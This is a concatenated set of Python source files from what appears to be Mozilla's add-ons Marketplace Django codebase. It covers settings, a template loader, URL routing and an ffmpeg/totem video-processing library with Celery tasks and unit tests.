CSP_FRAME_SRC = ("https://s3.amazonaws.com",
"https://ssl.google-analytics.com",
"https://login.persona.org",
"https://firefoxos.persona.org",
"https://www.youtube.com",
)
CSP_FONT_SRC = ("'self'", "fonts.mozilla.org", "www.mozilla.org",)
# Should robots.txt deny everything or disallow a calculated list of URLs we
# don't want to be crawled? Default is false, disallow everything.
# Also see http://www.google.com/support/webmasters/bin/answer.py?answer=93710
ENGAGE_ROBOTS = False
# Read-only mode setup.
READ_ONLY = False
# Turn on read-only mode in settings_local.py by putting this line
# at the VERY BOTTOM: read_only_mode(globals())
def read_only_mode(env):
env['READ_ONLY'] = True
# Replace the default (master) db with a slave connection.
if not env.get('SLAVE_DATABASES'):
raise Exception("We need at least one slave database.")
slave = env['SLAVE_DATABASES'][0]
env['DATABASES']['default'] = env['DATABASES'][slave]
# Add in the read-only middleware before csrf middleware.
extra = 'amo.middleware.ReadOnlyMiddleware'
before = 'session_csrf.CsrfMiddleware'
m = list(env['MIDDLEWARE_CLASSES'])
m.insert(m.index(before), extra)
env['MIDDLEWARE_CLASSES'] = tuple(m)
# Uploaded file limits
MAX_ICON_UPLOAD_SIZE = 4 * 1024 * 1024
MAX_IMAGE_UPLOAD_SIZE = 4 * 1024 * 1024
MAX_VIDEO_UPLOAD_SIZE = 4 * 1024 * 1024
MAX_PHOTO_UPLOAD_SIZE = MAX_ICON_UPLOAD_SIZE
MAX_PERSONA_UPLOAD_SIZE = 300 * 1024
MAX_REVIEW_ATTACHMENT_UPLOAD_SIZE = 5 * 1024 * 1024
MAX_WEBAPP_UPLOAD_SIZE = 2 * 1024 * 1024
# RECAPTCHA - copy all three statements to settings_local.py
RECAPTCHA_PUBLIC_KEY = ''
RECAPTCHA_PRIVATE_KEY = ''
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' %
RECAPTCHA_PUBLIC_KEY)
RECAPTCHA_AJAX_URL = (
'https://www.google.com/recaptcha/api/js/recaptcha_ajax.js')
# Send Django signals asynchronously on a background thread.
ASYNC_SIGNALS = True
REDIS_BACKENDS = {'master': 'redis://localhost:6379?socket_timeout=0.5'}
# Full path or executable path (relative to $PATH) of the spidermonkey js
# binary. It must be a version compatible with amo-validator
SPIDERMONKEY = None
VALIDATE_ADDONS = True
# Number of seconds before celery tasks will abort addon validation:
VALIDATOR_TIMEOUT = 110
# When True include full tracebacks in JSON. This is useful for QA on preview.
EXPOSE_VALIDATOR_TRACEBACKS = False
# Max number of warnings/errors to show from validator. Set to None for no
# limit.
VALIDATOR_MESSAGE_LIMIT = 500
# Feature flags
UNLINK_SITE_STATS = True
# Set to True if we're allowed to use X-SENDFILE.
XSENDFILE = True
XSENDFILE_HEADER = 'X-SENDFILE'
MOBILE_COOKIE = 'mamo'
# If the users's Firefox has a version number greater than this we consider it
# a beta.
MIN_BETA_VERSION = '3.7'
DEFAULT_SUGGESTED_CONTRIBUTION = 5
# Path to `ps`.
PS_BIN = '/bin/ps'
# The maximum file size that is shown inside the file viewer.
FILE_VIEWER_SIZE_LIMIT = 1048576
# The maximum file size that you can have inside a zip file.
FILE_UNZIP_SIZE_LIMIT = 104857600
# How long to delay tasks relying on file system to cope with NFS lag.
NFS_LAG_DELAY = 3
# A whitelist of domains that the authentication script will redirect to upon
# successfully logging in or out.
VALID_LOGIN_REDIRECTS = {
'builder': 'https://builder.addons.mozilla.org',
'builderstage': 'https://builder-addons.allizom.org',
'buildertrunk': 'https://builder-addons-dev.allizom.org',
}
# Secret key we send to builder so we can trust responses from the builder.
BUILDER_SECRET_KEY = 'love will tear us apart'
# The builder URL we hit to upgrade jetpacks.
BUILDER_UPGRADE_URL = 'https://addons.mozilla.org/services/builder'
BUILDER_VERSIONS_URL = ('https://builder.addons.mozilla.org/repackage/' +
'sdk-versions/')
## elasticsearch
ES_HOSTS = ['127.0.0.1:9200']
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = {'webapp': 'apps'}
ES_TIMEOUT = 30
ES_DEFAULT_NUM_REPLICAS = 2
ES_DEFAULT_NUM_SHARDS = 5
ES_USE_PLUGINS = False
# Default AMO user id to use for tasks.
TASK_USER_ID = 4757633
# If this is False, tasks and other jobs that send non-critical emails should
# use a fake email backend.
SEND_REAL_EMAIL = False
STATSD_HOST = 'localhost'
STATSD_PORT = 8125
STATSD_PREFIX = 'amo'
# The django statsd client to use, see django-statsd for more.
STATSD_CLIENT = 'django_statsd.clients.normal'
GRAPHITE_HOST = 'localhost'
GRAPHITE_PORT = 2003
GRAPHITE_PREFIX = 'amo'
GRAPHITE_TIMEOUT = 1
# IP addresses of servers we use as proxies.
KNOWN_PROXIES = []
# Blog URL
DEVELOPER_BLOG_URL = 'http://blog.mozilla.com/addons/feed/'
LOGIN_RATELIMIT_USER = 5
LOGIN_RATELIMIT_ALL_USERS = '15/m'
# The verification URL, the addon id will be appended to this. This will
# have to be altered to the right domain for each server, eg:
# https://receiptcheck.addons.mozilla.org/verify/
WEBAPPS_RECEIPT_URL = '%s/verify/' % SITE_URL
# The key we'll use to sign webapp receipts.
WEBAPPS_RECEIPT_KEY = ''
# The expiry that we will add into the receipt.
# Set to 6 months for the next little while.
WEBAPPS_RECEIPT_EXPIRY_SECONDS = 60 * 60 * 24 * 182
# Send a new receipt back when it expires.
WEBAPPS_RECEIPT_EXPIRED_SEND = False
CSRF_FAILURE_VIEW = 'amo.views.csrf_failure'
# Testing responsiveness without rate limits.
CELERY_DISABLE_RATE_LIMITS = True
# Temporary variables for the app-preview server, set this to True
# if you want to experience app-preview.mozilla.org.
APP_PREVIEW = False
# Name of view to use for homepage. AMO uses this. Marketplace has its own.
HOME = 'addons.views.home'
# Default file storage mechanism that holds media.
DEFAULT_FILE_STORAGE = 'amo.utils.LocalFileStorage'
# Defined in the site, this is to allow settings patch to work for tests.
NO_ADDONS_MODULES = ()
# Where to find ffmpeg and totem if it's not in the PATH.
FFMPEG_BINARY = 'ffmpeg'
TOTEM_BINARIES = {'thumbnailer': 'totem-video-thumbnailer',
'indexer': 'totem-video-indexer'}
VIDEO_LIBRARIES = ['lib.video.totem', 'lib.video.ffmpeg']
# Turn on/off the use of the signing server and all the related things. This
# is a temporary flag that we will remove.
SIGNING_SERVER_ACTIVE = False
# This is the signing REST server for signing receipts.
SIGNING_SERVER = ''
# And how long we'll give the server to respond.
SIGNING_SERVER_TIMEOUT = 10
# The domains that we will accept certificate issuers for receipts.
SIGNING_VALID_ISSUERS = []
# True when the Django app is running from the test suite.
IN_TEST_SUITE = False
# Until bug 753421 gets fixed, we're skipping ES tests. Sad times. I know.
# Flip this on in your local settings to experience the joy of ES tests.
RUN_ES_TESTS = False
# The configuration for the client that speaks to solitude.
# A tuple of the solitude hosts.
SOLITUDE_HOSTS = ('',)
# The oAuth key and secret that solitude needs.
SOLITUDE_KEY = ''
SOLITUDE_SECRET = ''
# The timeout we'll give solitude.
SOLITUDE_TIMEOUT = 10
# The OAuth keys to connect to the solitude host specified above.
SOLITUDE_OAUTH = {'key': '', 'secret': ''}
# Temporary flag to work with navigator.mozPay() on devices that don't
# support it natively.
SIMULATE_NAV_PAY = False
# When the dev. agreement gets updated and you need users to re-accept it
# change this date. You won't want to do this for minor format changes.
# The tuple is passed through to datetime.date, so please use a valid date
# tuple. If the value is None, then it will just not be used at all.
DEV_AGREEMENT_LAST_UPDATED = None
# If you want to allow self-reviews for add-ons/apps, then enable this.
# In production we do not want to allow this.
ALLOW_SELF_REVIEWS = False
# Modify the user-agents we check for in django-mobility
# (Android has since changed its user agent).
MOBILE_USER_AGENTS = ('mozilla.+mobile|android|fennec|iemobile|'
'iphone|opera (?:mini|mobi)')
#Credentials for accessing Google Analytics stats.
GOOGLE_ANALYTICS_CREDENTIALS = {}
#Which domain to access GA stats for. If not set, defaults to DOMAIN.
GOOGLE_ANALYTICS_DOMAIN = None
# Used for general web API access.
GOOGLE_API_CREDENTIALS = ''
# Google translate settings.
GOOGLE_TRANSLATE_API_URL = 'https://www.googleapis.com/language/translate/v2'
GOOGLE_TRANSLATE_REDIRECT_URL = (
'https://translate.google.com/#auto/{lang}/{text}')
# Domain to allow cross-frame requests from for privacy policy and TOS.
BROWSERID_DOMAIN = 'login.persona.org'
# Adjust these settings if you need to use a custom verifier.
BROWSERID_VERIFICATION_URL = 'https://verifier.login.persona.org/verify'
BROWSERID_JS_URL = 'https://login.persona.org/include.js'
# The issuer for unverified Persona email addresses.
# We only trust one issuer to grant us unverified emails.
# If UNVERIFIED_ISSUER is set to None, forceIssuer will not
# be sent to the client or the verifier.
NATIVE_BROWSERID_DOMAIN = 'firefoxos.persona.org'
UNVERIFIED_ISSUER = 'firefoxos.persona.org'
# This is a B2G (or other native) verifier. Adjust accordingly.
NATIVE_BROWSERID_VERIFICATION_URL = ('https://%s/verify'
% NATIVE_BROWSERID_DOMAIN)
NATIVE_BROWSERID_JS_URL = ('https://%s/include.js'
% NATIVE_BROWSERID_DOMAIN)
# These domains get `x-frame-options: allow-from` for Privacy Policy / TOS.
LEGAL_XFRAME_ALLOW_FROM = [
BROWSERID_DOMAIN,
UNVERIFIED_ISSUER,
'fxos.login.persona.org',
]
# Language pack fetcher settings
LANGPACK_OWNER_EMAIL = '[email protected]'
LANGPACK_DOWNLOAD_BASE = 'https://ftp.mozilla.org/pub/mozilla.org/'
LANGPACK_PATH_DEFAULT = '%s/releases/%s/win32/xpi/'
# E.g. https://ftp.mozilla.org/pub/mozilla.org/firefox/releases/23.0/SHA512SUMS
LANGPACK_MANIFEST_PATH = '../../SHA512SUMS'
LANGPACK_MAX_SIZE = 5 * 1024 * 1024 # 5MB should be more than enough
# Basket subscription url for newsletter signups
BASKET_URL = 'https://basket.mozilla.com'
# This saves us when we upgrade jingo-minify (jsocol/jingo-minify@916b054c).
JINGO_MINIFY_USE_STATIC = False
# Monolith settings.
MONOLITH_SERVER = None
MONOLITH_INDEX = 'time_*'
MONOLITH_MAX_DATE_RANGE = 365
# Error generation service. Should *not* be on in production.
ENABLE_API_ERROR_SERVICE = False
# The version we append to the app feature profile. Bump when we add new app
# features to the `AppFeatures` model.
APP_FEATURES_VERSION = 4
# Whether to throttle API requests. Default is True. Disable where appropriate.
API_THROTTLE = True
# Cache timeout on the /search/featured API.
CACHE_SEARCH_FEATURED_API_TIMEOUT = 60 * 60 # 1 hour.
# Whitelist IP addresses of the allowed clients that can post email
# through the API.
WHITELISTED_CLIENTS_EMAIL_API = []
# Base URL to the Bango Vendor Portal (keep the trailing question mark).
BANGO_BASE_PORTAL_URL = 'http://mozilla.com.test.bango.org/login/al.aspx?'
# URL to Boku signup flow, this will change per server.
# See https://mana.mozilla.org/wiki/display/MARKET/Boku for more.
#
# This a good test one that developers can use.
BOKU_SIGNUP_URL = 'https://merchants.boku.com/signup/signup_business?params=jEHWaTM7zm5cbPpheT2iS4xB1mkzO85uxVAo7rs7LVgy5JYGMWnUYDvxyEk8lxalYW56b6hrqfw%3D'
BOKU_PORTAL = 'https://merchants.boku.com/merchant_product_statistics'
# Auth token required to authorize a postfix host.
POSTFIX_AUTH_TOKEN = 'make-sure-to-override-this-with-a-long-weird-string'
# Domain name of the postfix server.
POSTFIX_DOMAIN = 'marketplace.firefox.com'
# This is a sample AES_KEY, we will override this on each server.
AES_KEYS = {
'api:access:secret': os.path.join(ROOT, 'mkt/api/sample-aes.key'),
}
# IARC content ratings.
IARC_ENV = 'test'
IARC_MOCK = False
IARC_PASSWORD = ''
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCDEMOService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCDEMORating/Submission.aspx'
IARC_PRIVACY_URL = 'https://www.globalratings.com/IARCPRODClient/privacypolicy.aspx'
IARC_TOS_URL = 'https://www.globalratings.com/IARCPRODClient/termsofuse.aspx'
IARC_ALLOW_CERT_REUSE = False
# The payment providers supported.
PAYMENT_PROVIDERS = ['bango']
# If you need to get a payment provider, which one will be the default?
DEFAULT_PAYMENT_PROVIDER = 'bango'
# The currently-recommended version of the API. Any requests to versions older
# than this will include the `API-Status: Deprecated` header.
API_CURRENT_VERSION = 1
# When True, the API will return a full traceback when an exception occurs.
API_SHOW_TRACEBACKS = False
# Allow URL style format override. eg. "?format=json"
URL_FORMAT_OVERRIDE = 'format'
########NEW FILE########
__FILENAME__ = template_loader
# -*- coding: utf-8 -*-
from django.conf import settings
from jingo import Loader as JingoLoader, Template
class Loader(JingoLoader):
"""Use JINGO_EXCLUDE_PATHS to exclude templates based on their path.
jingo.Loader has a JINGO_EXCLUDE_APPS that only allows to provide the "app"
part of a template (the part before the first "/").
It doesn't allow avoiding specific templates, for example mail templates
that we would like Django's template loader to render.
Using this loader, we may use the JINGO_EXCLUDE_PATHS settings to decide
whether a template should be rendered by Jingo or not.
Example usage:
JINGO_EXCLUDE_PATHS = (
'foo/bar',
)
This will exclude all templates starting with 'foo/bar', but not 'foo/baz'
nor 'quux/foo/bar'.
"""
def _valid_template(self, template_name):
"""Don't load templates if their name start with a prefix from
JINGO_EXCLUDE_PATHS."""
if isinstance(template_name, Template): # It's already a Template.
return True
jingo_valid = super(Loader, self)._valid_template(template_name)
if not jingo_valid:
return False
for path_prefix in getattr(settings, 'JINGO_EXCLUDE_PATHS', []):
if path_prefix in template_name:
return False
return True
########NEW FILE########
__FILENAME__ = test_template_loader
# -*- coding: utf-8 -*-
from django.test import TestCase
from lib.template_loader import Loader
class TestLoader(TestCase):
def test_valid_template(self):
loader = Loader()
with self.settings(JINGO_EXCLUDE_PATHS=[], JINGO_EXCLUDE_APPS=[]):
assert loader._valid_template('foo') # No JINGO_EXCLUDE_*.
with self.settings(JINGO_EXCLUDE_PATHS=[],
JINGO_EXCLUDE_APPS=['foo', 'bar/baz']):
assert not loader._valid_template('foo') # Excluded by jingo.
assert not loader._valid_template('foo/bar')
# This is valid, and shouldn't, and that's why we have our own
# loader which uses JINGO_EXCLUDE_PATHS.
assert loader._valid_template('bar/baz')
with self.settings(JINGO_EXCLUDE_PATHS=['foo/bar'],
JINGO_EXCLUDE_APPS=[]):
assert loader._valid_template('foo')
assert not loader._valid_template('foo/bar')
assert not loader._valid_template('foo/bar/baz')
########NEW FILE########
__FILENAME__ = urls_base
from django.conf import settings
from django.conf.urls import include, patterns, url
from django.contrib import admin
from django.shortcuts import redirect
from django.views.decorators.cache import cache_page
from django.views.i18n import javascript_catalog
admin.autodiscover()
handler403 = 'amo.views.handler403'
handler404 = 'amo.views.handler404'
handler500 = 'amo.views.handler500'
urlpatterns = patterns('',
# AMO homepage or Marketplace Developer Hub? Choose your destiny.
url('^$', settings.HOME, name='home'),
# Add-ons.
('', include('addons.urls')),
# Tags.
('', include('tags.urls')),
# Files
('^files/', include('files.urls')),
# AMO admin (not django admin).
('^admin/', include('zadmin.urls')),
# App versions.
('pages/appversions/', include('applications.urls')),
# Services
('', include('amo.urls')),
# Paypal
('^services/', include('paypal.urls')),
# Javascript translations.
url('^jsi18n.js$', cache_page(60 * 60 * 24 * 365)(javascript_catalog),
{'domain': 'javascript', 'packages': ['zamboni']}, name='jsi18n'),
# Redirect persona/xxx
('^getpersonas$',
lambda r: redirect('http://www.getpersonas.com/gallery/All/Popular',
permanent=True)),
url('^persona/(?P<persona_id>\d+)', 'addons.views.persona_redirect',
name='persona'),
# Redirect top-tags to tags/top
('^top-tags/?',
lambda r: redirect('tags.top_cloud', permanent=True)),
('^addons/contribute/(\d+)/?$',
lambda r, id: redirect('addons.contribute', id, permanent=True)),
)
if settings.TEMPLATE_DEBUG:
# Remove leading and trailing slashes so the regex matches.
media_url = settings.MEDIA_URL.lstrip('/').rstrip('/')
urlpatterns += patterns('',
(r'^%s/(?P<path>.*)$' % media_url, 'django.views.static.serve',
{'document_root': settings.MEDIA_ROOT}),
)
if settings.SERVE_TMP_PATH and settings.DEBUG:
urlpatterns += patterns('',
(r'^tmp/(?P<path>.*)$', 'django.views.static.serve',
{'document_root': settings.TMP_PATH}),
)
########NEW FILE########
__FILENAME__ = dummy
from .utils import VideoBase
class Video(VideoBase):
"""Used for testing."""
@classmethod
def library_available(cls):
return True
########NEW FILE########
__FILENAME__ = ffmpeg
import logging
import re
import tempfile
from django.conf import settings
from django_statsd.clients import statsd
from tower import ugettext as _
from .utils import check_output, subprocess, VideoBase
log = logging.getLogger('z.video')
formats_re = [
re.compile('Input #0, ([\w,]+)?, from'),
re.compile('doctype\s+: (\w+)'),
]
duration_re = re.compile('Duration: (\d{2}):(\d{2}):(\d{2}.\d{2}),')
dimensions_re = re.compile('Stream #0.*?(\d+)x(\d+)')
version_re = re.compile('ffmpeg version (\d\.+)', re.I)
class Video(VideoBase):
name = settings.FFMPEG_BINARY
def _call(self, note, catch_error, *args):
with statsd.timer('video.ffmpeg.%s' % note):
args = [self.name,
'-y', # Don't prompt for overwrite of file
'-i', self.filename] + list(args)
log.info('ffmpeg called with: %s' % ' '.join(args))
try:
res = check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError, e:
# This is because to get the information about a file
# you specify the input file, but not the output file
# ffmpeg errors, but returns all the information we want.
if not catch_error:
log.error('ffmpeg failed with: %s' % e.output)
raise
else:
res = e.output
return res
def get_meta(self):
"""
Get the metadata for the file. You should call this first
so we can populate some meta data and ensure that the file is valid.
"""
result = self._call('meta', True)
data = {}
for fmt in formats_re:
formats = fmt.search(result)
if formats:
data['formats'] = formats.group(1).split(',')
duration = duration_re.search(result)
if duration:
data['duration'] = ((3600 * int(duration.group(1)))
+ (60 * int(duration.group(2)))
+ float(duration.group(3)))
dimensions = dimensions_re.search(result)
if dimensions:
data['dimensions'] = (int(dimensions.group(1)),
int(dimensions.group(2)))
self.meta = data
def get_screenshot(self, size):
"""
Gets a screenshot half way through the video. Will return the location
of the temporary file. It is up to the calling function to remove the
temporary file after its completed.
`size`: a tuple of the width and height
"""
assert self.is_valid()
assert self.meta.get('duration')
halfway = int(self.meta['duration'] / 2)
dest = tempfile.mkstemp(suffix='.png')[1]
self._call('screenshot',
False,
'-vframes', '1', # Only grab one frame.
'-ss', str(halfway), # Start half way through.
'-s', '%sx%s' % size, # Size of image.
dest)
return dest
def get_encoded(self, size):
"""
Recodes the video into a different size and sets its bit rate
to something suitable. In theory we are also doing this to ensure
that the video is cleaned. Maybe.
Will return the location of the temporary file. It is up to the
calling function to remove the temporary file after its completed.
`size`: a tuple of the width and height
"""
assert self.is_valid()
dest = tempfile.mkstemp(suffix='.webm')[1]
self._call('encode',
False,
'-s', '%sx%s' % size, # Size of video.
dest)
return dest
def is_valid(self):
assert self.meta is not None
self.errors = []
if 'webm' not in self.meta.get('formats', ''):
self.errors.append(_('Videos must be in WebM.'))
#TODO(andym): More checks on duration, file size, bit rate?
return not self.errors
@classmethod
def library_available(cls):
try:
output = check_output([cls.name, '-version'],
stderr=subprocess.STDOUT)
# If in the future we want to check for an ffmpeg version
# this is the place to do it.
return bool(version_re.match(output))
except (OSError, subprocess.CalledProcessError):
pass
########NEW FILE########
__FILENAME__ = tasks
import logging
import os
import shutil
from django.conf import settings
from celeryutils import task
import amo
from amo.decorators import set_modified_on
from lib.video import library
import waffle
log = logging.getLogger('z.devhub.task')
time_limits = settings.CELERY_TIME_LIMITS['lib.video.tasks.resize_video']
# Video decoding can take a while, so let's increase these limits.
@task(time_limit=time_limits['hard'], soft_time_limit=time_limits['soft'])
@set_modified_on
def resize_video(src, instance, user=None, **kw):
"""Try and resize a video and cope if it fails."""
try:
result = _resize_video(src, instance, **kw)
except Exception, err:
log.error('Error on processing video: %s' % err)
_resize_error(src, instance, user)
raise
if not result:
log.error('Error on processing video, _resize_video not True.')
_resize_error(src, instance, user)
log.info('Video resize complete.')
return
def _resize_error(src, instance, user):
"""An error occurred in processing the video, deal with that approp."""
amo.log(amo.LOG.VIDEO_ERROR, instance, user=user)
instance.delete()
def _resize_video(src, instance, **kw):
"""
Given a preview object and a file somewhere: encode into the full
preview size and generate a thumbnail.
"""
log.info('[1@None] Encoding video %s' % instance.pk)
lib = library
if not lib:
log.info('Video library not available for %s' % instance.pk)
return
video = lib(src)
video.get_meta()
if not video.is_valid():
log.info('Video is not valid for %s' % instance.pk)
return
if waffle.switch_is_active('video-encode'):
# Do the video encoding.
try:
video_file = video.get_encoded(amo.ADDON_PREVIEW_SIZES[1])
except Exception:
log.info('Error encoding video for %s, %s' %
(instance.pk, video.meta), exc_info=True)
return
# Do the thumbnail next, this will be the signal that the
# encoding has finished.
try:
thumbnail_file = video.get_screenshot(amo.ADDON_PREVIEW_SIZES[0])
except Exception:
# We'll have this file floating around because the video
# encoded successfully, or something has gone wrong in which case
# we don't want the file around anyway.
if waffle.switch_is_active('video-encode'):
os.remove(video_file)
log.info('Error making thumbnail for %s' % instance.pk, exc_info=True)
return
for path in (instance.thumbnail_path, instance.image_path):
dirs = os.path.dirname(path)
if not os.path.exists(dirs):
os.makedirs(dirs)
shutil.move(thumbnail_file, instance.thumbnail_path)
if waffle.switch_is_active('video-encode'):
# Move the file over, removing the temp file.
shutil.move(video_file, instance.image_path)
else:
# We didn't re-encode the file.
shutil.copyfile(src, instance.image_path)
instance.sizes = {'thumbnail': amo.ADDON_PREVIEW_SIZES[0],
'image': amo.ADDON_PREVIEW_SIZES[1]}
instance.save()
log.info('Completed encoding video: %s' % instance.pk)
return True
########NEW FILE########
__FILENAME__ = tests
import os
import stat
import tempfile
from mock import Mock, patch
from nose import SkipTest
from nose.tools import eq_
import waffle
from django.conf import settings
import amo
import amo.tests
from amo.tests.test_helpers import get_image_path
from devhub.models import UserLog
from lib.video import get_library
from lib.video import ffmpeg, totem
from lib.video.tasks import resize_video
from users.models import UserProfile
files = {
'good': os.path.join(os.path.dirname(__file__),
'fixtures/disco-truncated.webm'),
'bad': get_image_path('mozilla.png'),
}
older_output = """
Input #0, matroska,webm, from 'lib/video/fixtures/disco-truncated.webm':
Duration: 00:00:10.00, start: 0.000000, bitrate: 298 kb/s
Stream #0:0(eng): Video: vp8, yuv420p, 640x360, SAR 1:1 DAR 16:9,
Stream #0:1(eng): Audio: vorbis, 44100 Hz, stereo, s16 (default)
"""
other_output = """
Input #0, matroska, from 'disco-truncated.webm':
Metadata:
doctype : webm
"""
totem_indexer_good = """
TOTEM_INFO_DURATION=10
TOTEM_INFO_HAS_VIDEO=True
TOTEM_INFO_VIDEO_WIDTH=640
TOTEM_INFO_VIDEO_HEIGHT=360
TOTEM_INFO_VIDEO_CODEC=VP8 video
TOTEM_INFO_FPS=25
TOTEM_INFO_HAS_AUDIO=True
TOTEM_INFO_AUDIO_BITRATE=128
TOTEM_INFO_AUDIO_CODEC=Vorbis
TOTEM_INFO_AUDIO_SAMPLE_RATE=44100
TOTEM_INFO_AUDIO_CHANNELS=Stereo
"""
totem_indexer_bad = """
TOTEM_INFO_HAS_VIDEO=False
TOTEM_INFO_HAS_AUDIO=False
"""
class TestFFmpegVideo(amo.tests.TestCase):
def setUp(self):
self.video = ffmpeg.Video(files['good'])
if not ffmpeg.Video.library_available():
raise SkipTest
self.video._call = Mock()
self.video._call.return_value = older_output
def test_meta(self):
self.video.get_meta()
eq_(self.video.meta['formats'], ['matroska', 'webm'])
eq_(self.video.meta['duration'], 10.0)
eq_(self.video.meta['dimensions'], (640, 360))
def test_valid(self):
self.video.get_meta()
assert self.video.is_valid()
def test_dev_valid(self):
self.video._call.return_value = other_output
self.video.get_meta()
eq_(self.video.meta['formats'], ['webm'])
# These tests can be a little bit slow, to say the least so they are
# skipped. Un-skip them if you want.
def test_screenshot(self):
raise SkipTest
self.video.get_meta()
try:
screenshot = self.video.get_screenshot(amo.ADDON_PREVIEW_SIZES[0])
assert os.stat(screenshot)[stat.ST_SIZE]
finally:
os.remove(screenshot)
def test_encoded(self):
raise SkipTest
self.video.get_meta()
try:
video = self.video.get_encoded(amo.ADDON_PREVIEW_SIZES[0])
assert os.stat(video)[stat.ST_SIZE]
finally:
os.remove(video)
class TestBadFFmpegVideo(amo.tests.TestCase):
def setUp(self):
self.video = ffmpeg.Video(files['bad'])
if not self.video.library_available():
raise SkipTest
self.video.get_meta()
def test_meta(self):
eq_(self.video.meta['formats'], ['image2'])
assert not self.video.is_valid()
def test_valid(self):
assert not self.video.is_valid()
def test_screenshot(self):
self.assertRaises(AssertionError, self.video.get_screenshot,
amo.ADDON_PREVIEW_SIZES[0])
def test_encoded(self):
self.assertRaises(AssertionError, self.video.get_encoded,
amo.ADDON_PREVIEW_SIZES[0])
class TestTotemVideo(amo.tests.TestCase):
def setUp(self):
self.video = totem.Video(files['good'])
self.video._call_indexer = Mock()
def test_meta(self):
self.video._call_indexer.return_value = totem_indexer_good
self.video.get_meta()
eq_(self.video.meta['formats'], 'VP8')
eq_(self.video.meta['duration'], '10')
def test_valid(self):
self.video._call_indexer = Mock()
self.video._call_indexer.return_value = totem_indexer_good
self.video.get_meta()
assert self.video.is_valid()
def test_not_valid(self):
self.video._call_indexer.return_value = totem_indexer_bad
self.video.get_meta()
assert not self.video.is_valid()
# These tests can be a little bit slow, to say the least so they are
# skipped. Un-skip them if you want.
def test_screenshot(self):
raise SkipTest
self.video.get_meta()
try:
screenshot = self.video.get_screenshot(amo.ADDON_PREVIEW_SIZES[0])
assert os.stat(screenshot)[stat.ST_SIZE]
finally:
os.remove(screenshot)
def test_encoded(self):
raise SkipTest
self.video.get_meta()
try:
video = self.video.get_encoded(amo.ADDON_PREVIEW_SIZES[0])
assert os.stat(video)[stat.ST_SIZE]
finally:
os.remove(video)
@patch('lib.video.totem.Video.library_available')
@patch('lib.video.ffmpeg.Video.library_available')
@patch.object(settings, 'VIDEO_LIBRARIES',
['lib.video.totem', 'lib.video.ffmpeg'])
def test_choose(ffmpeg_, totem_):
ffmpeg_.return_value = True
totem_.return_value = True
eq_(get_library(), totem.Video)
totem_.return_value = False
eq_(get_library(), ffmpeg.Video)
ffmpeg_.return_value = False
eq_(get_library(), None)
class TestTask(amo.tests.TestCase):
# TODO(andym): make these more sparkly and cope with totem and not blow
# up all the time.
def setUp(self):
waffle.models.Switch.objects.create(name='video-encode', active=True)
self.mock = Mock()
self.mock.thumbnail_path = tempfile.mkstemp()[1]
self.mock.image_path = tempfile.mkstemp()[1]
self.mock.pk = 1
@patch('lib.video.tasks._resize_video')
def test_resize_error(self, _resize_video):
user = UserProfile.objects.create(email='[email protected]')
_resize_video.side_effect = ValueError
with self.assertRaises(ValueError):
resize_video(files['good'], self.mock, user=user)
assert self.mock.delete.called
assert UserLog.objects.filter(user=user,
activity_log__action=amo.LOG.VIDEO_ERROR.id).exists()
@patch('lib.video.tasks._resize_video')
def test_resize_failed(self, _resize_video):
user = UserProfile.objects.create(email='[email protected]')
_resize_video.return_value = None
resize_video(files['good'], self.mock, user=user)
assert self.mock.delete.called
@patch('lib.video.ffmpeg.Video.get_encoded')
def test_resize_video_no_encode(self, get_encoded):
raise SkipTest
waffle.models.Switch.objects.update(name='video-encode', active=False)
resize_video(files['good'], self.mock)
assert not get_encoded.called
assert isinstance(self.mock.sizes, dict)
assert self.mock.save.called
def test_resize_video(self):
raise SkipTest
resize_video(files['good'], self.mock)
assert isinstance(self.mock.sizes, dict)
assert self.mock.save.called
def test_resize_image(self):
raise SkipTest
resize_video(files['bad'], self.mock)
assert not isinstance(self.mock.sizes, dict)
assert not self.mock.save.called
########NEW FILE########
__FILENAME__ = totem
import logging
import os
import re
import tempfile
from django.conf import settings
from django_statsd.clients import statsd
from tower import ugettext as _
from .utils import check_output, subprocess, VideoBase
log = logging.getLogger('z.video')
format_re = re.compile('TOTEM_INFO_VIDEO_CODEC=([\w]+)')
duration_re = re.compile('TOTEM_INFO_DURATION=(\d+)')
class Video(VideoBase):
name = settings.TOTEM_BINARIES
def _call_indexer(self):
with statsd.timer('video.totem.meta'):
args = [self.name['indexer'],
self.filename]
if not os.path.exists(self.filename):
log.info('file did not exist for thumbnailing: %s'
% self.filename)
raise
log.info('totem called with: %s' % ' '.join(args))
try:
res = check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError, e:
log.error('totem failed with: %s' % e.output)
raise
log.info('totem returned: %s' % res)
return res
def _call_thumbnailer(self, timepoint, destination, size):
with statsd.timer('video.totem.screenshot'):
args = [self.name['thumbnailer'],
'-t', timepoint, # Start at this point.
'-s', size, # This can only be one of the sizes.
'-r', # Remove overlayed borders.
self.filename,
destination]
log.info('totem called with: %s' % ' '.join(args))
try:
res = check_output(args, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError, e:
log.error('totem failed with: %s' % e.output)
raise
return res
def get_meta(self):
result = self._call_indexer()
data = {}
formats = format_re.search(result)
if formats:
data['formats'] = formats.group(1)
duration = duration_re.search(result)
if duration:
data['duration'] = duration.group(1)
self.meta = data
def get_screenshot(self, size):
assert self.is_valid()
assert self.meta.get('duration')
halfway = int(self.meta['duration']) / 2
dest = tempfile.mkstemp(suffix='.png')[1]
self._call_thumbnailer(str(halfway), dest, str(max(size)))
return dest
def is_valid(self):
assert self.meta is not None
self.errors = []
if 'VP8' not in self.meta.get('formats', ''):
self.errors.append(_('Videos must be in WebM.'))
#TODO(andym): More checks on duration, file size, bit rate?
return not self.errors
@classmethod
def library_available(cls):
try:
# We'll assume if the thumbnailer is there so is the indexer.
check_output([cls.name['thumbnailer'], '-help'],
stderr=subprocess.STDOUT)
return True
except (OSError, subprocess.CalledProcessError):
pass
########NEW FILE########
__FILENAME__ = utils
import subprocess
def check_output(*popenargs, **kwargs):
# Tell thee, check_output was from Python 2.7 untimely ripp'd.
# check_output shall never vanquish'd be until
# Marketplace moves to Python 2.7.
if 'stdout' in kwargs:
raise ValueError('stdout argument not allowed, it will be overridden.')
